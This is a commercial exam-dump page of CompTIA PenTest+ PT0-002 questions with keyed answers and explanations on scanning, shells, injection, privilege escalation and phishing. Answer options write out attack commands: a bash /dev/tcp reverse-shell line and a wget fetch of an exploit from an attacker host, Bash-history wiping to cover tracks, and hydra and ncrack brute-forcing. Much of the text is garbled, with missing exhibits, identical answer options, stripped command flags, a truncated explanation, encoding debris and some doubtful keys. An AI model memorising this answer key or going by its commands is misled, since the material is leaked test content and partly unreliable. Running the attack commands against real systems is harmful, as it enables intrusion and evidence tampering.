Welcome to download the Newest 2passeasy PT0-002 dumps

https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

Exam Questions PT0-002

CompTIA PenTest+ Certification Exam

https://www.2passeasy.com/dumps/PT0-002/

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

NEW QUESTION 1
You are a penetration tester running port scans on a server. INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

A. Mastered
B. Not Mastered

Answer: A

Explanation:
Part 1 - 192.168.2.2 -O -sV --top-ports=100 and SMB vulns
Part 2 - Weak SMB file permissions
https://subscription.packtpub.com/book/networking-and-servers/9781786467454/1/ch01lvl1sec13/fingerprinting

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

NEW QUESTION 2
A penetration tester conducted a discovery scan that generated the following:

Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?

A. nmap –oG list.txt 192.168.0.1-254 , sort

B. nmap –sn 192.168.0.1-254 , grep “Nmap scan” | awk ‘{print S5}’
C. nmap –-open 192.168.0.1-254, uniq
D. nmap –o 192.168.0.1-254, cut –f 2

Answer: B

Explanation:
the NMAP flag (-sn) which is for host discovery and returns that kind of NMAP output. And the AWK command selects column 5 ({print $5}) which obviously carries
the returned IP of the host in the NMAP output.
This command will generate the results shown in the image and transform them into a list of active hosts for further analysis. The command consists of three parts:
nmap -sn 192.168.0.1-254: This part uses nmap, a network scanning tool, to perform a ping scan (-sn) on the IP range 192.168.0.1-254, which means sending
ICMP echo requests to each IP address and checking if they respond.
grep “Nmap scan”: This part uses grep, a text filtering tool, to search for the string “Nmap scan” in the output of the previous part and display only the
matching lines. This will filter out the lines that show the start and end time of the scan and only show the lines that indicate the status of each host.
awk ‘{print $5}’: This part uses awk, a text processing tool, to print the fifth field ($5) of each line in the output of the previous part. This will extract only the IP
addresses of each host and display them as a list.
The final output will look something like this: 192.168.0.1 192.168.0.12 192.168.0.17 192.168.0.34

NEW QUESTION 3
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

A. chmod u+x script.sh

B. chmod u+e script.sh
C. chmod o+e script.sh
D. chmod o+x script.sh

Answer: A

NEW QUESTION 4
An assessor wants to use Nmap to help map out a stateful firewall rule set. Which of the following scans will the assessor MOST likely run?

A. nmap 192.168.0.1/24
B. nmap 192.168.0.1/24
C. nmap oG 192.168.0.1/24
D. nmap 192.168.0.1/24

Answer: A

NEW QUESTION 5
Which of the following expressions in Python increase a variable val by one (Choose two.)

A. val++
B. +val
C. val=(val+1)
D. ++val
E. val=val++
F. val+=1

Answer: CF

Explanation:
In Python, there are two ways to increase a variable by one: using the assignment operator (=) with an arithmetic expression, or using the augmented assignment
operator (+=). The expressions val=(val+1) and val+=1 both achieve this goal. The expressions val++ and ++val are not valid in Python, as there is no increment
operator. The expressions +val and val=val++ do not change the value of val2.
https://pythonguides.com/increment-and-decrement-operators-in-python/

NEW QUESTION 6
A penetration tester ran the following command on a staging server:

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

python –m SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

A. nc 10.10.51.50 9891 < exploit

B. powershell –exec bypass –f \\10.10.51.50\9891
C. bash –i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit
D. wget 10.10.51.50:9891/exploit

Answer: D

NEW QUESTION 7
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious. INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

A. Mastered
B. Not Mastered

Answer: A

Explanation:
* 1. Reflected XSS - Input sanitization (<> ...)
* 2. Sql Injection Stacked - Parameterized Queries
* 3. DOM XSS - Input Sanitization (<> ...)
* 4. Local File Inclusion - sandbox req
* 5. Command Injection - sandbox req
* 6. SQLi union - paramtrized queries
* 7. SQLi error - paramtrized queries

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

* 8. Remote File Inclusion - sandbox

* 9. Command Injection - input saniti $
* 10. URL redirect - prevent external calls

NEW QUESTION 8
A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named
password.txt in the /home/svsacct directory:
U3VQZXIkM2NyZXQhCg==
Which of the following commands should the tester use NEXT to decode the contents of the file?

A. echo U3VQZXIkM2NyZXQhCg== | base64 €"d

B. tar zxvf password.txt
C. hydra €"l svsacct €"p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24
D. john --wordlist /usr/share/seclists/rockyou.txt password.txt

Answer: A

NEW QUESTION 9
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP
protocol. Which of the following methods would be the BEST to accomplish this objective?

A. Wait for the next login and perform a downgrade attack on the server.
B. Capture traffic using Wireshark.
C. Perform a brute-force attack over the server.
D. Use an FTP exploit against the server.

Answer: B

NEW QUESTION 10
A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the
.pcap file?

A. Nmap
B. Wireshark
C. Metasploit
D. Netcat

Answer: B

NEW QUESTION 10
During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a
web application. Which of the following vulnerabilities has the penetration tester exploited?

A. Command injection
B. Broken authentication
C. Direct object reference
D. Cross-site scripting

Answer: C

Explanation:
Insecure direct object reference (IDOR) is a vulnerability where the developer of the application does not implement authorization features to verify that someone
accessing data on the site is allowed to access that data.

NEW QUESTION 13
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

A. Analyze the malware to see what it does.

B. Collect the proper evidence and then remove the malware.
C. Do a root-cause analysis to find out how the malware got in.
D. Remove the malware immediately.
E. Stop the assessment and inform the emergency contact.

Answer: E

Explanation:
Stopping the assessment and informing the emergency contact is the best thing to do next after identifying that an application being tested has already been
compromised with malware. This is because continuing the assessment might interfere with an ongoing investigation or compromise evidence collection. The
emergency contact is the person designated by the client who should be notified in case of any critical issues or incidents during the penetration testing
engagement.

NEW QUESTION 14
A penetration tester breaks into a company's office building and discovers the company does not have a shredding service. Which of the following attacks should
the penetration tester try next?

A. Dumpster diving
B. Phishing

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

C. Shoulder surfing
D. Tailgating

Answer: A

Explanation:
The penetration tester should try dumpster diving next, which is an attack that involves searching through trash bins or dumpsters for discarded documents or
items that may contain sensitive or useful information. Dumpster diving can reveal information such as passwords, account numbers, credit card numbers,
invoices, receipts, memos, contracts, or employee records. The penetration tester can use this information to gain access to systems or networks, impersonate
users or employees, or perform social engineering attacks. The other options are not likely attacks that the penetration tester should try next based on the
discovery that the company does not have a shredding service. Phishing is an attack that involves sending fraudulent emails that appear to be from legitimate
sources to trick users into revealing their credentials or clicking on malicious links or attachments. Shoulder surfing is an attack that involves observing or spying
on users while they enter their credentials or perform other tasks on their devices. Tailgating is an attack that involves following authorized personnel into a
restricted area without proper authorization or identification.

NEW QUESTION 17
Which of the following tools would be best suited to perform a cloud security assessment?

A. OpenVAS
B. Scout Suite
C. Nmap
D. ZAP
E. Nessus

Answer: B

Explanation:
The tool that would be best suited to perform a cloud security assessment is Scout Suite, which is an
open-source multi-cloud security auditing tool that can evaluate the security posture of cloud environments, such as AWS, Azure, GCP, or Alibaba Cloud. Scout
Suite can collect configuration data from cloud providers using APIs and assess them against security best practices or benchmarks, such as CIS Foundations.
Scout Suite can generate reports that highlight security issues, risks, or gaps in the cloud environment, and provide recommendations for remediation or
improvement. The other options are not tools that are specifically designed for cloud security assessment. OpenVAS is an open-source vulnerability scanner that
can scan hosts and networks for vulnerabilities and generate reports with findings and recommendations. Nmap is an open-source network scanner and
enumerator that can scan hosts and networks for ports, services, versions, OS, or other information1. ZAP is an open-source web application scanner and proxy
that can scan web applications for vulnerabilities and perform attacks such as SQL injection or XSS. Nessus is a commercial vulnerability scanner that can scan
hosts and networks for vulnerabilities and generate reports with findings and recommendations.

NEW QUESTION 22
After gaining access to a Linux system with a non-privileged account, a penetration tester identifies the following file:

Which of the following actions should the tester perform FIRST?

A. Change the file permissions.

B. Use privilege escalation.
C. Cover tracks.
D. Start a reverse shell.

Answer: B

Explanation:
The file .scripts/daily_log_backup.sh has permissions set to 777, meaning that anyone can read, write, or execute the file. Since it's owned by the root user and the
penetration tester has access to the system with a non-privileged account, this could be a potential avenue for privilege escalation. In a penetration test, after
finding such a file, the tester would likely want to explore it and see if it can be leveraged to gain higher privileges. This is often done by inserting malicious code or
commands into the script if it's being executed with higher privileges, such as root in this case.

NEW QUESTION 24
Appending string values onto another string is called:

A. compilation
B. connection
C. concatenation
D. conjunction

Answer: C

Explanation:
Concatenation is the term used to describe the process of appending string values onto another string. In Python, concatenation can be done using the + operator,
such as “Hello” + “World” = "HelloWorld"4.

NEW QUESTION 29
A penetration tester gives the following command to a systems administrator to execute on one of the target servers:
rm -f /var/www/html/G679h32gYu.php
Which of the following BEST explains why the penetration tester wants this command executed?

A. To trick the systems administrator into installing a rootkit

B. To close down a reverse shell
C. To remove a web shell after the penetration test

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

D. To delete credentials the tester created

Answer: C

Explanation:
s for why the penetration tester wants this command executed.

NEW QUESTION 32
Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)

A. OWASP ZAP
B. Nmap
C. Nessus
D. BeEF
E. Hydra
F. Burp Suite

Answer: AF

NEW QUESTION 36
A penetration tester writes the following script:

Which of the following is the tester performing?

A. Searching for service vulnerabilities

B. Trying to recover a lost bind shell
C. Building a reverse shell listening on specified ports
D. Scanning a network for specific open ports

Answer: D

Explanation:
-z zero-I/O mode [used for scanning]
-v verbose
example output of script:
* 10.1.1.1 : inverse host lookup failed: Unknown host (UNKNOWN) [10.0.0.1] 22 (ssh) open
(UNKNOWN) [10.0.0.1] 23 (telnet) : Connection timed out https://unix.stackexchange.com/questions/589561/what-is-nc-z-used-for

NEW QUESTION 41
A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting
money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this
type of activity in the future?

A. Enforce mandatory employee vacations

B. Implement multifactor authentication
C. Install video surveillance equipment in the office
D. Encrypt passwords for bank account information

Answer: A

Explanation:
If the employee already works in the accounting department, MFA will not stop their actions because they'll already have access by virtue of their job.
Enforcing mandatory employee vacations is the best recommendation to prevent this type of activity in the future, as it will make it harder for an employee to
conceal fraudulent transactions or unauthorized changes to a payment system. Mandatory employee vacations are a form of internal control that requires
employees to take time off from work periodically and have their duties performed by someone else. This can help detect errors, irregularities, or frauds committed
by employees who might otherwise have exclusive access or control over certain processes or systems.

NEW QUESTION 44
A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original
list of IP addresses for the engagement. Which of the following is the BEST option for the tester to take?

A. Segment the firewall from the cloud.

B. Scan the firewall for vulnerabilities.
C. Notify the client about the firewall.
D. Apply patches to the firewall.

Answer: C

Explanation:
The best option for the tester to take is to notify the client about the firewall. The firewall is not part of the original list of IP addresses for the engagement, which
means it is out of scope and should not be tested without permission. The tester should inform the client about the existence and potential risks of the firewall, and

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

ask if they want to include it in the scope or not.

NEW QUESTION 48
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch –r .bash_history temp mv temp .bash_history
Which of the following actions is the tester MOST likely performing?

A. Redirecting Bash history to /dev/null

B. Making a copy of the user's Bash history for further enumeration
C. Covering tracks by clearing the Bash history
D. Making decoy files on the system to confuse incident responders

Answer: C

Explanation:
The commands are used to clear the Bash history file of the current user, which records the commands entered in the terminal. The first command redirects
/dev/null (a special file that discards any data written to it) to temp, which creates an empty file named temp. The second command changes the timestamp of
temp to match that of .bash_history (the hidden file that stores the Bash history). The third command renames temp to .b ash_history, which overwrites the original
file with an empty one. This effectively erases any trace of the commands executed by the user.

NEW QUESTION 52
During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the
pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the
browser: unauthorized to view this page. Which of the following BEST explains what occurred?

A. The SSL certificates were invalid.

B. The tester IP was blocked.
C. The scanner crashed the system.
D. The web page was not found.

Answer: B

Explanation:
The most likely explanation for what occurred is that the tester IP was blocked by the web server. The web server may have detected the web scanner as a
malicious or suspicious activity and blocked the tester’s IP address from accessing the web application. This could result in an unauthorized to view this page
message in the browser.

NEW QUESTION 57
An organization wants to identify whether a less secure protocol is being utilized on a wireless network. Which of the following types of attacks will achieve this
goal?

A. Protocol negotiation
B. Packet sniffing
C. Four-way handshake
D. Downgrade attack

Answer: D

Explanation:
A downgrade attack is a type of attack that exploits a vulnerability in the protocol negotiation process between a client and a server to force them to use a less
secure protocol than they originally intended. A downgrade attack can be used to identify whether a less secure protocol is being utilized on a wireless network by
intercepting and modifying the messages exchanged during the protocol negotiation phase, such as the association request and response frames, and making the
client and the server agree on a weaker protocol, such as WEP or WPA, instead of a stronger one, such as WPA2 or WPA3. A downgrade attack can also enable
the attacker to perform other attacks, such as cracking the encryption keys or capturing the network traffic, more easily by taking advantage of the weaknesses of
the less secure protocol. A downgrade attack can be performed by using tools such as Airgeddon, which is a multi-use bash script for Linux systems to audit
wireless networks1.

NEW QUESTION 62
A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being transmitted?

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

A. Decode the authorization header using UTF-8.

B. Decrypt the authorization header using bcrypt.
C. Decode the authorization header using Base64.
D. Decrypt the authorization header using AES.

Answer: C

NEW QUESTION 67
A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to
delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept
exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which
of the following concerns would BEST support the software company’s request?

A. The reverse-engineering team may have a history of selling exploits to third parties.
B. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
C. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
D. The reverse-engineering team will be given access to source code for analysis.

Answer: A

NEW QUESTION 71
The attacking machine is on the same LAN segment as the target host during an internal penetration test. Which of the following commands will BEST enable the
attacker to conduct host delivery and write the discovery to files without returning results of the attack machine?

A. nmap snn exclude 10.1.1.15 10.1.1.0/24 oA target_txt

B. nmap iR10oX out.xml | grep Nmap | cut d "f5 > live-hosts.txt
C. nmap PnsV OiL target.txt A target_text_Service
D. nmap sSPn n iL target.txt A target_txtl

Answer: A

Explanation:
According to the Official CompTIA PenTest+ Self-Paced Study Guide1, the correct answer is A. nmap -sn -n
-exclude 10.1.1.15 10.1.1.0/24 -oA target_txt.
This command will perform a ping scan (-sn) without reverse DNS resolution (-n) on the IP range 10.1.1.0/24,
excluding the attack machine’s IP address (10.1.1.15) from the scan (-exclude). It will also output the results in three formats (normal, grepable and XML) with a
base name of target_txt (-oA).

NEW QUESTION 72
A penetration tester ran the following commands on a Windows server:

Which of the following should the tester do AFTER delivering the final report?

A. Delete the scheduled batch job.

B. Close the reverse shell connection.
C. Downgrade the svsaccount permissions.
D. Remove the tester-created credentials.

Answer: D

NEW QUESTION 76
Which of the following BEST describe the OWASP Top 10? (Choose two.)

A. The most critical risks of web applications

B. A list of all the risks of web applications
C. The risks defined in order of importance
D. A web-application security standard
E. A risk-governance and compliance framework
F. A checklist of Apache vulnerabilities

Answer: AC

Explanation:
These two options best describe the OWASP Top 10, which stands for Open Web Application Security Project Top 10 and is a list of the most critical web
application security risks based on data from various sources and experts. The list is updated periodically to reflect changes in technology and threat landscape.
The list also ranks the risks in order of importance based on their prevalence, impact, and ease of exploitation or remediation. The other options are not accurate
descriptions of the OWASP Top 10. The list does not cover all the risks of web applications, but rather focuses on the most common and severe ones. The list is
not a web application security standard, but rather a guideline or reference for developers, testers, and security professionals. The list is not a risk-governance and
compliance framework, but rather a resource or tool for identifying and mitigating web application vulnerabilities. The list is not a checklist of Apache vulnerabilities,
but rather a general list of web application risks that apply to any web server or platform.

NEW QUESTION 77
Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

A. To provide feedback on the report structure and recommend improvements

B. To discuss the findings and dispute any false positives
C. To determine any processes that failed to meet expectations during the assessment
D. To ensure the penetration-testing team destroys all company data that was gathered during the test

Answer: C

NEW QUESTION 78
Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as
the intended audience?

A. Executive summary of the penetration-testing methods used

B. Bill of materials including supplies, subcontracts, and costs incurred during assessment
C. Quantitative impact assessments given a successful software compromise
D. Code context for instances of unsafe type-casting operations

Answer: D

Explanation:
Code context for instances of unsafe type-casting operations would most likely be included in the final report of a static application-security test that was written
with a team of application developers as the intended audience, as it would provide relevant and actionable information for the developers to fix the vulnerabilities.
Type-casting is the process of converting one data type to another, such as an integer to a string. Unsafe type-casting can lead to errors, crashes, or security
issues, such as buffer overflows or code injection.

NEW QUESTION 82
A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.
Which of the following is the MOST likely reason for the lack of output?

A. The HTTP port is not open on the firewall.

B. The tester did not run sudo before the command.
C. The web server is using HTTPS instead of HTTP.
D. This URI returned a server error.

Answer: A

NEW QUESTION 85
A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company’s web presence.
Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)

A. IP addresses and subdomains

B. Zone transfers
C. DNS forward and reverse lookups
D. Internet search engines
E. Externally facing open ports
F. Shodan results

Answer: AD

Explanation:
* A. IP addresses and subdomains. This is correct. IP addresses and subdomains are useful information for a penetration tester to identify the scope and range of
the company’s web presence. IP addresses can reveal the location, network, and service provider of the company’s web servers, while subdomains can indicate
the different functions and features of the company’s website. A penetration tester can use tools like whois, Netcraft, or DNS lookups to find IP addresses and
subdomains associated with the company’s domain name.

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

* D. Internet search engines. This is correct. Internet search engines are powerful tools for a penetration tester to perform passive information gathering around the
company’s web presence. Search engines can provide a wealth of information, such as the company’s profile, history, news, social media accounts, reviews,
products, services, customers, partners, competitors, and more. A penetration tester can use advanced search operators and keywords to narrow down the results
and find relevant information. For example, using the site: operator can limit the results to a specific domain or subdomain, while using the intitle: operator can filter
the results the title of the web pages.

NEW QUESTION 89
A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete
the scan of the system?

A. Weekly
B. Monthly
C. Quarterly
D. Annually

Answer: C

Explanation:
Quarterly is the minimum frequency to complete the scan of the system that is PCI DSS v3.2.1 compliant, according to Requirement 11.2.2 of the standard1. PCI
DSS (Payment Card Industry Data Security Standard) is a set of security standards that applies to any organization that processes, stores, or transmits credit card
information. Requirement 11.2.2 states that organizations must perform internal vulnerability scans at least quarterly and after any significant change in the
network.
https://www.pcicomplianceguide.org/faq/#25
PCI DSS requires quarterly vulnerability/penetration tests, not weekly.

NEW QUESTION 94
A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras. Which of the following is a technique the tester can
use to gain access to the IT framework without being detected?

A. Pick a lock.
B. Disable the cameras remotely.
C. Impersonate a package delivery worker.
D. Send a phishing email.

Answer: C

NEW QUESTION 97
A penetration tester analyzed a web-application log file and discovered an input that was sent to the company's web application. The input contains a string that
says "WAITFOR." Which of the following attacks is being attempted?

A. SQL injection
B. HTML injection
C. Remote command injection
D. DLL injection

Answer: A

Explanation:
WAITFOR can be used in a type of SQL injection attack known as time delay SQL injection or blind SQL injection34. This attack works on the basis that true or
false queries can be answered by the amount of time a request takes to complete. For example, an attacker can inject a WAITFOR command with a delay
argument into an input field of a web application that uses SQL Server as its database. If the query returns true, then the web application will pause for the
specified period of time before responding; if the query returns false, then the web application will respond immediately. By observing the response time, the
attacker can infer information about the database structure and data1.
Based on this information, one possible answer to your question is A. SQL injection, because it is an attack that exploits a vulnerability in a web application that
allows an attacker to execute arbitrary SQL commands on the database server.

NEW QUESTION 98
A penetration tester runs a scan against a server and obtains the following output: 21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-12-20 09:23AM 331 index.aspx
| ftp-syst:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2012 Std 3389/tcp open ssl/ms-wbt-server
| rdp-ntlm-info:
| Target Name: WEB3
| NetBIOS_Computer_Name: WEB3
| Product_Version: 6.3.9600
|_ System_Time: 2021-01-15T11:32:06+00:00
8443/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
Which of the following command sequences should the penetration tester try NEXT?

A. ftp 192.168.53.23
B. smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 –U guest
C. ncrack –u Administrator –P 15worst_passwords.txt –p rdp 192.168.53.23
D. curl –X TRACE https://192.168.53.23:8443/index.aspx

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

E. nmap –-script vuln –sV 192.168.53.23

Answer: A

NEW QUESTION 102

Which of the following is a rules engine for managing public cloud accounts and resources?

A. Cloud Custodian
B. Cloud Brute
C. Pacu
D. Scout Suite

Answer: A

Explanation:
Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to define policies to enable a well managed cloud
infrastructure, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified
metrics and reporting.
Cloud Custodian is a tool that can be used to manage public cloud accounts and resources. Cloud Custodian can define policies and rules for cloud resources
based on various criteria, such as tags, filters, actions, modes, or schedules. Cloud Custodian can enforce compliance, governance, security, cost optimization,
and operational efficiency for cloud resources. Cloud Custodian supports multiple public cloud providers, such as AWS, Azure, GCP, and Kubernetes. Cloud Brute
is a tool that can be used to enumerate cloud platforms and discover hidden files and buckets. Pacu is a tool that can be used to exploit AWS environments and
perform post-exploitation actions. Scout Suite is a tool that can be used to audit cloud environments and identify security issues.

NEW QUESTION 105

An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and
additional information about those systems.
Which of the following is the penetration tester trying to accomplish?

A. Uncover potential criminal activity based on the evidence gathered.

B. Identify all the vulnerabilities in the environment.
C. Limit invasiveness based on scope.
D. Maintain confidentiality of the findings.

Answer: C

NEW QUESTION 107

For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an
urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users
enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the
following information:

Which of the following lines of code should the security engineer add to make the attack successful?

A. window.location.= 'https://evilcorp.com'
B. crossDomain: true
C. geturlparameter ('username')
D. redirectUrl = 'https://example.com'

Answer: B

NEW QUESTION 111

Which of the following tools provides Python classes for interacting with network protocols?

A. Responder
B. Impacket
C. Empire
D. PowerSploit

Answer: B

Explanation:
Impacket is a tool that provides Python classes for interacting with network protocols, such as SMB, DCE/RPC, LDAP, Kerberos, etc. Impacket can be used for
network analysis, packet manipulation, authentication spoofing, credential dumping, lateral movement, and remote execution.

NEW QUESTION 112

Which of the following concepts defines the specific set of steps and approaches that are conducted during a penetration test?

A. Scope details
B. Findings
C. Methodology
D. Statement of work

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

Answer: C

NEW QUESTION 113

A penetration tester has gained access to the Chief Executive Officer's (CEO's) internal, corporate email. The next objective is to gain access to the network.
Which of the following methods will MOST likely work?

A. Try to obtain the private key used for S/MIME from the CEO's account.
B. Send an email from the CEO's account, requesting a new account.
C. Move laterally from the mail server to the domain controller.
D. Attempt to escalate privileges on the mail server to gain root access.

Answer: D

NEW QUESTION 116

A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports
that might be interesting to a potential attacker?

A. nmap192.168.1.1-5–PU22-25,80
B. nmap192.168.1.1-5–PA22-25,80
C. nmap192.168.1.1-5–PS22-25,80
D. nmap192.168.1.1-5–Ss22-25,80

Answer: C

Explanation:
PS/PA/PU/PY are host discovery flags which use TCP SYN/ACK, UDP or SCTP discovery respectively. And since the ports in the options are mostly used by TCP
protocols, then it's either the PS or PA flag. But since we need to know if the ports are live, sending SYN packet is a better alternative. Hence, I choose PS in this
case.
The nmap –PS22-25,80 192.168.1.1-5 command will return vulnerable ports that might be interesting to a potential attacker, as it will perform a TCP SYN scan on
ports 22, 23, 24, 25, and 80 of the target hosts. A TCP SYN scan is a stealthy technique that sends a SYN packet to each port and waits for a response. If the
response is a SYN/ACK packet, it means the port is open and listening for connections. If the response is a
RST packet, it means the port is closed and not accepting connections. If there is no response, it means the por is filtered by a firewall or IDS1.

NEW QUESTION 117

A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a
datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?

A. Data flooding
B. Session riding
C. Cybersquatting
D. Side channel

Answer: D

Explanation:
https://www.techtarget.com/searchsecurity/definition/side-channel-attack#:~:text=Side%2Dchannel%20attacks%

NEW QUESTION 122

Penetration on an assessment for a client organization, a penetration tester notices numerous outdated software package versions were installed ...s-critical
servers. Which of the following would best mitigate this issue?

A. Implementation of patching and change control programs

B. Revision of client scripts used to perform system updates
C. Remedial training for the client's systems administrators
D. Refrainment from patching systems until quality assurance approves

Answer: A

Explanation:
The best way to mitigate this issue is to implement patching and change control programs, which are processes that involve applying updates or fixes to software
packages to address vulnerabilities, bugs, or performance issues, and managing or documenting the changes made to the software packages to ensure
consistency, compatibility, and security. Patching and change control programs can help prevent or reduce the risk of attacks that exploit outdated software
package versions, which may contain known or unknown vulnerabilities that can compromise the security or functionality of the systems or servers. Patching and
change control programs can be implemented by using tools such as WSUS, which is a tool that can manage and distribute updates for Windows systems and
applications1, or Git, which is a tool that can track and control changes to source code or files2. The other options are not valid ways to mitigate this issue.
Revision of client scripts used to perform system updates is not a sufficient way to mitigate this issue, as it may not address the root cause of why the software
package versions are outdated, such as lack of awareness, resources, or policies. Remedial training for the client’s systems administrators is not a direct way to
mitigate this issue, as it may not result in immediate or effective actions to update the software package versions. Refrainment from patching systems until quality
assurance approves is not a way to mitigate this issue, but rather a potential cause or barrier for why the software package versions are outdated.

NEW QUESTION 125

A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would
allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the
proprietary service responds?

A. Nmap
B. tcpdump
C. Scapy

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

D. hping3

Answer: C

Explanation:
https://0xbharath.github.io/art-of-packet-crafting-with-scapy/scapy/creating_packets/index.html https://scapy.readthedocs.io/en/latest/introduction.html#about-scapy
Scapy is a powerful and interactive packet manipulation tool that allows the security professional to easily and programmatically manipulate the TCP header length
and checksum using arbitrary numbers and to observe how the proprietary service responds. Scapy can craft, send, receive, and analyze packets of various
protocols, such as TCP, UDP, ICMP, or IP. Scapy can also modify any field of any layer of a packet, such as the TCP header length and checksum, which are
used to indicate the size and integrity of the TCP segment. Scapy can also display the response packets from the target system, which can reveal how the
proprietary service handles the invalid packet.

NEW QUESTION 127

During an assessment, a penetration tester manages to exploit an LFI vulnerability and browse the web log for a target Apache server. Which of the following
steps would the penetration tester most likely try NEXT to further exploit the web server? (Choose two.)

A. Cross-site scripting
B. Server-side request forgery
C. SQL injection
D. Log poisoning
E. Cross-site request forgery
F. Command injection

Answer: DF

Explanation:
